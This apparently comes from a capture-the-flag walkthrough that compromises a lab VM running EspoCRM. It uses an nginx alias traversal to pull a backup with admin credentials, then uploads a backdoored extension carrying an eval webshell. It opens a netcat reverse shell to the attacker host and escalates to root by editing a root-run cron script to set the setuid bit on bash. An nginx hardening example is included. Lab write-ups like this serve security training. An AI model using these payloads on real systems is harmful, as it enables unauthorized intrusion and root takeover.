Target machine address

Information gathering

Host discovery

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:3e:b3:0d (Unknown)
192.168.56.117 08:00:27:38:1e:5d (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.901 seconds (134.67 hosts/sec). 3 responded

192.168.56.117 is the address of my target machine.

Port scanning

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 12:22 EDT
Nmap scan report for 192.168.56.117
Host is up (0.0063s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open http nginx
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: EspoCRM
MAC Address: 08:00:27:38:1E:5D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds

An SSH service and a web page.

Web page on port 80

Port 80 is just a login form.

image-20250318002335847

For me, this kind of login request is not easy to brute-force.

image-20250318002552388

Page fingerprinting

┌──(root㉿kali)-[/home/kali]
└─# whatweb 192.168.56.117
http://192.168.56.117 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[192.168.56.117], PHP[8.2.7], PoweredBy[EspoCRM], Script[text/javascript], Title[EspoCRM], UncommonHeaders[x-content-type-options,content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/8.2.7], nginx

nginx as the middleware, running EspoCRM.

After some searching, EspoCRM has no readily exploitable vulnerabilities. (There is one CVE about uploading PHP code through the extension installation page, but isn't that just normal functionality? ...)

image-20250318003954826

There is an admin route (nothing of interest in robots.txt).

This nginx deployment has a directory traversal vulnerability.

image-20250318004103006

It turns up an _oldsite directory.

image-20250318004541580

And then an info file.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl 192.168.56.117/admin../_oldsite/info
# Backup Configuration Settings
# This configuration file dictates the backup protocols for critical data storage.

# Directory for storing backup files
# All backup files are stored in compressed ZIP format for efficient space usage and security.
# Ensure that backups are regularly updated and verified for data integrity.

backup_directory: /admin/_oldsite
backup_format: zip
# Note: The backup directory is designated for ZIP file backups only.
# Regular maintenance and checks are required to ensure data consistency and reliability.
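The /admin../_oldsite/info request works because of the well-known nginx alias "off-by-slash" misconfiguration: a location prefix with no trailing slash paired with an alias that ends in one, so nginx substitutes the alias for the matched prefix and leaves "../" to climb one level above the aliased directory. The snippet below is an added example, not the target's actual configuration (the writeup does not show it); the filesystem paths are assumed.

```nginx
# Vulnerable pattern (assumed paths). The prefix "/admin" has no trailing
# slash but the alias does, so the URI "/admin../_oldsite/info" is matched
# by this block and mapped to
#   /var/www/html/admin/ + "../_oldsite/info"
# which resolves to /var/www/html/_oldsite/info, outside the intended
# directory. The ".." is glued to "admin", so nginx does not normalise it
# away before location matching.
location /admin {
    alias /var/www/html/admin/;
}

# Hardened: give the location prefix the same trailing slash as the alias.
# "/admin../_oldsite/info" no longer starts with "/admin/", so it never
# reaches this block and the traversal is closed. (Use this block instead
# of the one above; nginx rejects duplicate locations in one server.)
location /admin/ {
    alias /var/www/html/admin/;
}

# Equivalent alternative: drop alias and use root, which appends the whole
# URI to the root path and is not subject to the prefix/alias mismatch:
#   location /admin/ { root /var/www/html; }
```

A quick check for the weak pattern is `nginx -T | grep -B1 alias` and looking for any `location` line in the output whose prefix lacks a trailing slash while the `alias` value ends with one.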

There is a ZIP backup of the site.

image-20250318005110558

Downloading this backup.zip gives the site's source code.

data/config.php contains the administrator username and password.

image-20250318005253667

After logging in, go to the administration panel, to the Extensions section.

image-20250318005450889

I found a free extension on the official website and downloaded it.

image-20250318005535710

You may run into this error:

image-20250318005815755

At this point you need to change the value of acceptableVersions in manifest.json to something below 7.2.4.

image-20250318005918732

Then, after inserting your webshell into the extension's source, zip it up again and upload it.

At this point you may hit a new problem: "It's not an Installation package."

image-20250318010440853

That is because the directory structure inside the zip has to be like the one on the left, not the one on the right.

image-20250318010610828

Once it uploads successfully, install it!

image-20250318010715447

I inserted @eval($_REQUEST['a']); die(phpinfo()); in too many places and broke the target's web environment myself.

image-20250318010739490

The request from when I tested the zip upload earlier was still in my Burp Suite Repeater module.

I tried clicking Send, and the page returned phpinfo().

image-20250318011006050

Command execution achieved.

image-20250318011043445

For some reason my AntSword (蚁剑) could not connect here.

image-20250318011133824

Let's just send a reverse shell back to my Kali instead: nc -e /bin/bash 192.168.56.103 7777

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvkp 7777
listening on [any] 7777 ...
192.168.56.117: inverse host lookup failed: Unknown host
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.117] 41572
whoami
www-data

I uploaded pspy64 and took a look at the processes.

image-20250318011627823

The root user runs cron.php on a schedule.

And at the same time we can edit cron.php. Hey, I have an idea 🤓👆

We write system("chmod +s /bin/bash"); into cron.php 🤓👆

Then, after a short wait, bash has the setuid bit set.

image-20250318012153202

Now all we need is bash -p.

image-20250318012229804